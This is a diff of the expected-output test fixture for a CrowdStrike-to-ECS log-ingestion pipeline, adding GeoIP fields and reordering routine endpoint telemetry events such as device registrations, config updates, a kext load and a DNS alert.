"{\"event_simpleName\":\"IOServiceRegister\",\"ContextTimeStamp\":\"1625622770.595\",\"ConfigStateHash\":\"3967242894\",\"aip\":\"67.43.156.13\",\"IOServiceClass\":\"IOUSBDevice:IOUSBNub:IOService:IORegistryEntry:OSObject\",\"ConfigBuild\":\"1007.4.0013701.1\",\"IOServicePath\":\"IOService:/IOResources/AppleUSBHostResources/AppleUSBLegacyRoot/AppleUSBVHCIBCE@80000000/Touch Bar Backlight@80700000\",\"event_platform\":\"Mac\",\"IOServiceProperties\":\"\",\"Entitlements\":\"15\",\"name\":\"IOServiceRegisterMacV1\",\"id\":\"ffffffff-1111-11eb-9dc2-029257dbe83b\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff44564c2f8d76394cb25c31ab\",\"IOServiceName\":\"Touch Bar Backlight\",\"timestamp\":\"1625677480056\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:04:40.056Z", "kind": "event", 
@@ -2450,30 +2798,33 @@ ] }, { + "observer": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "vendor": "crowdstrike", + "ip": "67.43.156.13", + "serial_number": "ffffffff44564c2f8d76394cb25c31ab", + "type": "agent", + "version": "1007.4.0013701.1" + }, "process": { "entity_id": "364938416497226937", "thread": { "id": 0 } }, + "@timestamp": "2021-07-07T01:50:02.031Z", "os": { "type": "macos" }, - "url": { - "scheme": "http" - }, - "tags": [ - "preserve_original_event" - ], - "observer": { - "serial_number": "ffffffff44564c2f8d76394cb25c31ab", - "address": "67.43.156.13", - "type": "agent", - "version": "1007.4.0013701.1", - "vendor": "crowdstrike", - "ip": "67.43.156.13" - }, - "@timestamp": "2021-07-07T01:50:02.031Z", "ecs": { "version": "1.12.0" }, @@ -2489,7 +2840,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150778600Z", + "ingested": "2021-12-14T14:41:26.533762612Z", "original": "{\"event_simpleName\":\"PtyCreated\",\"ContextTimeStamp\":\"1625622602.031\",\"ConfigStateHash\":\"3967242894\",\"ContextProcessId\":\"364938416497226937\",\"DeviceId\":\"251658248\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.13\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"PtyCreatedMacV1\",\"id\":\"ffffffff-1111-11eb-9dc2-029257dbe83b\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff44564c2f8d76394cb25c31ab\",\"timestamp\":\"1625677478739\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:04:38.739Z", "kind": "event", 
@@ -2510,31 +2861,36 @@ "DeviceId": "251658248", "Entitlements": "15", "cid": "ffffffff15754bcfb5f9152ec7ac90ac" - } - }, - { - "os": { - "type": "macos" - }, - "source": { - "address": "67.43.156.14", - "ip": "67.43.156.14" }, "url": { "scheme": "http" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { - "serial_number": "ffffffff5ae3449ab33a1809fe6c5ce2", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff5ae3449ab33a1809fe6c5ce2", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:04:35.967Z", + "os": { + "type": "macos" + }, "ecs": { "version": "1.12.0" }, @@ -2549,8 +2905,24 @@ "67.43.156.14" ] }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.14", + "ip": "67.43.156.14" + }, "event": { - "ingested": "2021-12-09T13:36:11.150784800Z", + "ingested": "2021-12-14T14:41:26.533763004Z", "original": "{\"LocalAddressIP4\":\"67.43.156.14\",\"event_simpleName\":\"LocalIpAddressRemovedIP4\",\"ConfigStateHash\":\"1803419442\",\"aip\":\"67.43.156.14\",\"InterfaceIndex\":\"18\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"NetLuidIndex\":\"2\",\"Entitlements\":\"15\",\"name\":\"LocalIpAddressRemovedIP4MacV1\",\"id\":\"ffffffff-1111-11eb-b7b7-066cc89bcebf\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff5ae3449ab33a1809fe6c5ce2\",\"timestamp\":\"1625677475967\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:04:35.967Z", "kind": "state", 
@@ -2573,7 +2945,13 @@ "name": "LocalIpAddressRemovedIP4MacV1", "EffectiveTransmissionClass": "2", "cid": "ffffffff15754bcfb5f9152ec7ac90ac" - } + }, + "url": { + "scheme": "http" + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -2605,12 +2983,21 @@ "direction": "unknown" }, "observer": { - "serial_number": "ffffffff335f47ca89cad6a19f203bbd", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.8.0011308.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffff335f47ca89cad6a19f203bbd", + "type": "agent", + "version": "1007.8.0011308.1" }, "@timestamp": "2021-07-07T17:04:34.875Z", "ecs": { @@ -2630,7 +3017,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150791400Z", + "ingested": "2021-12-14T14:41:26.533763504Z", "original": "{\"event_simpleName\":\"NetworkCloseIP6\",\"ContextTimeStamp\":\"1625677474.875\",\"LocalAddressIP6\":\"0:0:0:0:0:0:0:1\",\"RemoteAddressIP6\":\"0:0:0:0:0:0:0:1\",\"ConfigStateHash\":\"1701000200\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"12241681491990\",\"RemotePort\":\"9\",\"aip\":\"67.43.156.13\",\"ConfigBuild\":\"1007.8.0011308.1\",\"event_platform\":\"Lin\",\"LocalPort\":\"59999\",\"Entitlements\":\"15\",\"name\":\"NetworkCloseIP6LinV6\",\"id\":\"ffffffff-1111-11eb-8130-02cde7751097\",\"Protocol\":\"17\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff335f47ca89cad6a19f203bbd\",\"ConnectionDirection\":\"2\",\"InContext\":\"0\",\"timestamp\":\"1625677475413\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:04:35.413Z", "kind": "event", 
@@ -2657,17 +3044,23 @@ }, { "observer": { - "serial_number": "ffffffffa74a4c89b9984a3a7124bb9d", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.8.0011611.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffa74a4c89b9984a3a7124bb9d", + "type": "agent", + "version": "1007.8.0011611.1" }, "@timestamp": "2021-07-07T17:04:50.580Z", - "os": { - "type": "linux" - }, "ecs": { "version": "1.12.0" }, @@ -2682,8 +3075,11 @@ "67.43.156.14" ] }, + "os": { + "type": "linux" + }, "event": { - "ingested": "2021-12-09T13:36:11.150797700Z", + "ingested": "2021-12-14T14:41:26.533763902Z", "original": "{\"ConfigBuild\":\"1007.8.0011611.1\",\"event_simpleName\":\"ConfigStateUpdate\",\"event_platform\":\"Lin\",\"ConfigStateHash\":\"1156120155\",\"ConfigStateData\":\"0,0,1007.8.0011611.1|1,c,0|1,22,6|1,59,2d|2,0,a8000000032,140000000085,18000000004c,18000000004f,180000000054,18000000022a,180000000248,180000000279,18000000027a,1800000002b4,180400000079,180400000225,180c00000133,180c00000285,181000000128,181000000180,18100000021f,181000000220,181000000280,1c0400000205|\",\"name\":\"ConfigStateUpdateLinV2\",\"aip\":\"67.43.156.14\",\"id\":\"ffffffff-1111-11eb-af89-06c111484f9f\",\"aid\":\"ffffffffa74a4c89b9984a3a7124bb9d\",\"timestamp\":\"1625677490580\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:04:50.580Z", "kind": "event", 
@@ -2717,30 +3113,33 @@ ] }, { + "observer": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.14", + "vendor": "crowdstrike", + "ip": "67.43.156.14", + "serial_number": "ffffffff0cd64fb78626ab1b6c65ac8c", + "type": "agent", + "version": "1007.4.0013701.1" + }, "process": { "entity_id": "364839648316192383", "thread": { "id": 0 } }, + "@timestamp": "2021-07-07T17:04:53.531Z", "os": { "type": "macos" }, - "url": { - "scheme": "http" - }, - "tags": [ - "preserve_original_event" - ], - "observer": { - "serial_number": "ffffffff0cd64fb78626ab1b6c65ac8c", - "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", - "vendor": "crowdstrike", - "ip": "67.43.156.14" - }, - "@timestamp": "2021-07-07T17:04:53.531Z", "ecs": { "version": "1.12.0" }, @@ -2756,7 +3155,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150804Z", + "ingested": "2021-12-14T14:41:26.533764382Z", "original": "{\"event_simpleName\":\"SuspiciousDnsRequest\",\"ContextTimeStamp\":\"1625677493.531\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"364839648316192383\",\"DomainName\":\"hg-t2.dotice.me\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"SuspiciousDnsRequestMacV1\",\"id\":\"ffffffff-1111-11eb-a4a3-02cbdfb8f529\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff0cd64fb78626ab1b6c65ac8c\",\"timestamp\":\"1625677493756\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"RequestType\":\"1\"}", "created": "2021-07-07T17:04:53.756Z", "kind": "alert", 
@@ -2778,21 +3177,33 @@ "Entitlements": "15", "cid": "ffffffff15754bcfb5f9152ec7ac90ac", "RequestType": "1" - } + }, + "url": { + "scheme": "http" + }, + "tags": [ + "preserve_original_event" + ] }, { "observer": { - "serial_number": "ffffffffabd047b1a86c1fcd8ef22b59", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.8.0011611.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffabd047b1a86c1fcd8ef22b59", + "type": "agent", + "version": "1007.8.0011611.1" }, "@timestamp": "2021-07-07T17:05:30.922Z", - "os": { - "type": "linux" - }, "ecs": { "version": "1.12.0" }, @@ -2807,8 +3218,11 @@ "67.43.156.14" ] }, + "os": { + "type": "linux" + }, "event": { - "ingested": "2021-12-09T13:36:11.150810300Z", + "ingested": "2021-12-14T14:41:26.533764761Z", "original": "{\"Parameter2\":\"0\",\"event_simpleName\":\"ErrorEvent\",\"Parameter1\":\"18446744072635810412\",\"Parameter3\":\"0\",\"ConfigStateHash\":\"1156120155\",\"aip\":\"67.43.156.14\",\"Line\":\"96\",\"ConfigBuild\":\"1007.8.0011611.1\",\"event_platform\":\"Lin\",\"ErrorStatus\":\"3759276032\",\"name\":\"ErrorEventLinV1\",\"id\":\"ffffffff-1111-11eb-bdd3-0681aa29cecb\",\"Facility\":\"16778240\",\"aid\":\"ffffffffabd047b1a86c1fcd8ef22b59\",\"File\":\"0\",\"timestamp\":\"1625677530922\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:30.922Z", "kind": "alert", 
@@ -2843,17 +3257,23 @@ }, { "observer": { - "serial_number": "ffffffffa15a452190ae454f7d33e07e", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffa15a452190ae454f7d33e07e", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:05:30.590Z", - "os": { - "type": "macos" - }, "ecs": { "version": "1.12.0" }, 
@@ -2868,8 +3288,11 @@ "67.43.156.14" ] }, + "os": { + "type": "macos" + }, "event": { - "ingested": "2021-12-09T13:36:11.150816600Z", + "ingested": "2021-12-14T14:41:26.533765207Z", "original": "{\"event_simpleName\":\"ConfigStateUpdate\",\"ConfigStateHash\":\"3090255842\",\"ConfigStateData\":\"0,0,1007.4.0013701.1|1,2,1|1,4,a|1,6,0|1,8,46|1,a,1|1,c,0|1,17,1f|1,18,18|1,19,0|1,1e,407|1,21,3d2|1,27,1|1,53,18b|1,56,0|1,d0,16d|1,d1,0|1,d2,0|1,df,4c|1,e0,6|1,f6,1|1,1f5,1|1,1f7,1|1,1fd,1|1,200,0|2,0,138,a8000000032,140000000085,140000000153,18000000004c,18000000004f,180000000050,180000000051,180000000054,1800000000e1,1800000000e7,180000000144,18000000014e,18000000015a,18000000020e,180000000226,180000000227,180400000079,18040000009b,18040000009c,1804000000ff,180400000117,180400000118,180400000142,180400000163,180400000164,180400000166,180400000167,1804000001b2,1804000001f2,1804000001f3,180400000225,1804000002be,1804000002bf,1804000002ca,1804000002cb,1808000000c9,1808000000ee,1808000000fc,1808000000fd,1808000000fe,180c0000016b,180c0000016c,180c0000016d,180c0000016e,180c0000016f,180c00000170,180c000001b6,180c000001b7,180c000001b8,180c000001b9,180c000001f6,180c000001f7,180c000001f8,180c000002c2,180c000002c3,180c000002c4,180c000002ce,180c000002cf,180c000002d0,18100000011e,18100000011f,181000000120,181000000121,181000000122,181000000123,181000000124,181000000125,181000000126,181000000128,181000000169,18100000016a,181000000180,1810000001b1,1810000001c3,18100000021f,181000000220,18100000024e,18100000025b,181000000280,1810000002ad,1810000002d6,1810000002d7,1810000002f3,1c04000000a1,1c04000000a2,1c04000000a3,1c04000000a4,1c04000000a5,1c04000000a6,1c040000011a,1c040000011b,1c040000011c,1c0400000268,1c0400000269,1c040000026a,1c040000026c,1c040000026d,1c040000026e,1c0400000271,1c0400000272,1c0400000273,1c0400000275,1c0400000276,1c0400000277,1c040000028f,1c0400000290,1c0400000291,1c0400000293,1c0400000294,1c0400000295,1c0400000297,1c0400000298,1c0400000299,1c040000029b,1c040000029c,1c
040000029d,1c040000029f,1c04000002a0|3,0,65|\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"ConfigStateUpdateMacV2\",\"id\":\"ffffffff-1111-11eb-8dc4-0234c12f9875\",\"EffectiveTransmissionClass\":\"0\",\"aid\":\"ffffffffa15a452190ae454f7d33e07e\",\"timestamp\":\"1625677530590\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:30.590Z", "kind": "event", @@ -2927,30 +3350,33 @@ ] }, { + "observer": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.14", + "vendor": "crowdstrike", + "ip": "67.43.156.14", + "serial_number": "ffffffffaa0e47a1b009aef151d6179d", + "type": "agent", + "version": "1007.4.0013701.1" + }, "process": { "entity_id": "364867547408058681", "thread": { "id": 0 } }, + "@timestamp": "2021-07-07T17:05:09.064Z", "os": { "type": "macos" }, - "url": { - "scheme": "http" - }, - "tags": [ - "preserve_original_event" - ], - "observer": { - "serial_number": "ffffffffaa0e47a1b009aef151d6179d", - "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", - "vendor": "crowdstrike", - "ip": "67.43.156.14" - }, - "@timestamp": "2021-07-07T17:05:09.064Z", "ecs": { "version": "1.12.0" }, 
@@ -2966,7 +3392,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150822900Z", + "ingested": "2021-12-14T14:41:26.533765625Z", "original": "{\"event_simpleName\":\"KextLoad\",\"ContextTimeStamp\":\"1625677509.064\",\"ConfigStateHash\":\"1620585913\",\"ContextProcessId\":\"364867547408058681\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"BundleID\":\"com.apple.driver.AudioAUUC\",\"Entitlements\":\"15\",\"name\":\"KextLoadMacV1\",\"id\":\"ffffffff-1111-11eb-a2ae-028f6bf89be7\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffaa0e47a1b009aef151d6179d\",\"timestamp\":\"1625677509069\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:09.069Z", "kind": "event", @@ -2987,21 +3413,33 @@ "EffectiveTransmissionClass": "2", "Entitlements": "15", "cid": "ffffffff15754bcfb5f9152ec7ac90ac" - } + }, + "url": { + "scheme": "http" + }, + "tags": [ + "preserve_original_event" + ] }, { "observer": { - "serial_number": "ffffffff67d54f7daf3d998ffc74d48e", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.8.0011110.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff67d54f7daf3d998ffc74d48e", + "type": "agent", + "version": "1007.8.0011110.1" }, "@timestamp": "2021-07-07T17:05:07.901Z", - "os": { - "type": "linux" - }, "ecs": { "version": "1.12.0" }, 
@@ -3016,9 +3454,12 @@ "67.43.156.14" ] }, + "os": { + "type": "linux" + }, "event": { "action": "ChannelVersionRequired", - "ingested": "2021-12-09T13:36:11.150829300Z", + "ingested": "2021-12-14T14:41:26.533766069Z", "original": "{\"ChannelVersion\":\"25\",\"event_simpleName\":\"ChannelVersionRequired\",\"ConfigStateHash\":\"3155796140\",\"aip\":\"67.43.156.14\",\"ChannelVersionRequired\":\"0\",\"ChannelId\":\"20\",\"ConfigBuild\":\"1007.8.0011110.1\",\"event_platform\":\"Lin\",\"name\":\"ChannelVersionRequiredLinV1\",\"id\":\"ffffffff-1111-11eb-b411-06baeacb7a63\",\"aid\":\"ffffffff67d54f7daf3d998ffc74d48e\",\"timestamp\":\"1625677507901\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "id": "ffffffff-1111-11eb-b411-06baeacb7a63", "created": "2021-07-07T17:05:07.901Z" @@ -3065,12 +3506,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffffe22549479fbe8293b6747a68", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.8.0011308.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffe22549479fbe8293b6747a68", + "type": "agent", + "version": "1007.8.0011308.1" }, "@timestamp": "2021-07-07T17:05:11.754Z", "ecs": { 
@@ -3089,7 +3539,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150835800Z", + "ingested": "2021-12-14T14:41:26.533766451Z", "original": "{\"event_simpleName\":\"ProcessRollup2Stats\",\"ConfigStateHash\":\"2037712541\",\"Timeout\":\"60\",\"ParentProcessId\":\"0\",\"aip\":\"67.43.156.14\",\"SuppressType\":\"3\",\"SHA256HashData\":\"64e48365207d0c19008ba7d53d75c0de3fcd5a1590e4c40fc69c677663fedc20\",\"ProcessCount\":\"60\",\"BoundedCount\":\"57\",\"ConfigBuild\":\"1007.8.0011308.1\",\"UID\":\"115\",\"event_platform\":\"Lin\",\"CommandLine\":\"sh -c \\\"/usr/lib/erlang/erts-11.1.3/bin/epmd\\\" -daemon\",\"Entitlements\":\"15\",\"name\":\"ProcessRollup2StatsLinV3\",\"id\":\"ffffffff-1111-11eb-b34e-063f4cefccb3\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffe22549479fbe8293b6747a68\",\"timestamp\":\"1625677511754\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:11.754Z", "kind": "state", @@ -3119,24 +3569,27 @@ } }, { - "os": { - "type": "macos" - }, - "url": { - "scheme": "http" - }, - "tags": [ - "preserve_original_event" - ], "observer": { - "serial_number": "ffffffff44564c2f8d76394cb25c31ab", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffff44564c2f8d76394cb25c31ab", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:04:38.122Z", + "os": { + "type": "macos" + }, "ecs": { "version": "1.12.0" }, 
@@ -3155,7 +3608,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150842Z", + "ingested": "2021-12-14T14:41:26.533766894Z", "original": "{\"event_simpleName\":\"UserIdentity\",\"LoginSessionId\":\"1138166333440\",\"AuthenticationUuidAsString\":\"FFFFEEEE-DDDD-CCCC-BBBB-AAAA00000109\",\"UserName\":\"user1\",\"ConfigStateHash\":\"3967242894\",\"aip\":\"67.43.156.13\",\"AuthenticationId\":\"265\",\"UserPrincipal\":\"user1@dom1\",\"UserSid\":\"S-1-5-21-3852557355-3178143607-2040168074-1530\",\"ConfigBuild\":\"1007.4.0013701.1\",\"UID\":\"265\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"UserIdentityMacV4\",\"id\":\"ffffffff-1111-11eb-9dc2-029257dbe83b\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff44564c2f8d76394cb25c31ab\",\"AuthenticationUuid\":\"FFFFEEEE-DDDD-CCCC-BBBB-AAAA00000109\",\"timestamp\":\"1625677478122\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:04:38.122Z", "kind": "event", @@ -3189,21 +3642,33 @@ "id": "265", "email": "user1@dom1", "domain": "dom1" - } + }, + "url": { + "scheme": "http" + }, + "tags": [ + "preserve_original_event" + ] }, { "observer": { - "serial_number": "ffffffff45d647e6ae0ba8764a4bd570", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff45d647e6ae0ba8764a4bd570", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:04:49.052Z", - "os": { - "type": "macos" - }, "ecs": { "version": "1.12.0" }, 
@@ -3219,9 +3684,12 @@ "67.43.156.14" ] }, + "os": { + "type": "macos" + }, "event": { "action": "DeliverLocalFXToCloud", - "ingested": "2021-12-09T13:36:11.150848500Z", + "ingested": "2021-12-14T14:41:26.533767276Z", "original": "{\"FeatureVector\":\"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\",\"event_simpleName\":\"DeliverLocalFXToCloud\",\"ConfigStateHash\":\"1620585913\",\"aip\":\"67.43.156.14\",\"ModelPrediction\":\"1436899696705536\",\"SHA256HashData\":\"c89caf538788e6524bf4ae93194051f3389eecbc71e4793f12a2dc0368211cc2\",\"Malicious\":\"0\",\"ConfigBuild\":\"1007.4.0013701.1\",\"FeatureExtractionVersion\":\"2\",\"event_platform\":\"Mac\",\"FXFileSize\":\"502032\",\"Entitlements\":\"15\",\"name\":\"DeliverLocalFXToCloudMacV4\",\"PupAdwareDecisionValue\":\"12384657383358464\",\"id\":\"ffffffff-1111-11eb-b44e-069a02b0ad6b\",\"PupAdwareConfidence\":\"0\",\"EffectiveTransmissionClass\":\"1\",\"aid\":\"ffffffff45d647e6ae0ba8764a4bd570\",\"MLModelVersion\":\"4\",\"timestamp\":\"1625677489052\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "id": "ffffffff-1111-11eb-b44e-069a02b0ad6b", "created": "2021-07-07T17:04:49.052Z" @@ -3287,12 +3755,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffffb3a3442585c05abc61e290fc", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffb3a3442585c05abc61e290fc", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:05:24.929Z", "file": { 
@@ -3316,7 +3793,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.150854800Z", + "ingested": "2021-12-14T14:41:26.533767662Z", "original": "{\"event_simpleName\":\"CreateProcessArgs\",\"ContextTimeStamp\":\"1625677524.929\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"365035560818271291\",\"ContextThreadId\":\"365035560818271291\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"CommandLine\":\"t.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/CategorySurfaceViewController.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationActionView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationAddressView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationErrorView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationHeaderView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationLoadingView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationPostalCodeView.o -o 
/Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationViewController.o -index-store-path /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Index/DataStore -index-system-modules\",\"Entitlements\":\"15\",\"name\":\"CreateProcessArgsMac\",\"id\":\"ffffffff-1111-11eb-8332-020506b18db5\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffb3a3442585c05abc61e290fc\",\"timestamp\":\"1625677525128\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/bin/swift-frontend\"}", "created": "2021-07-07T17:05:25.128Z", "kind": "state", @@ -3355,12 +3832,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffffc4044541995bffd84b9df003", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffffc4044541995bffd84b9df003", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:04:48.523Z", "file": { 
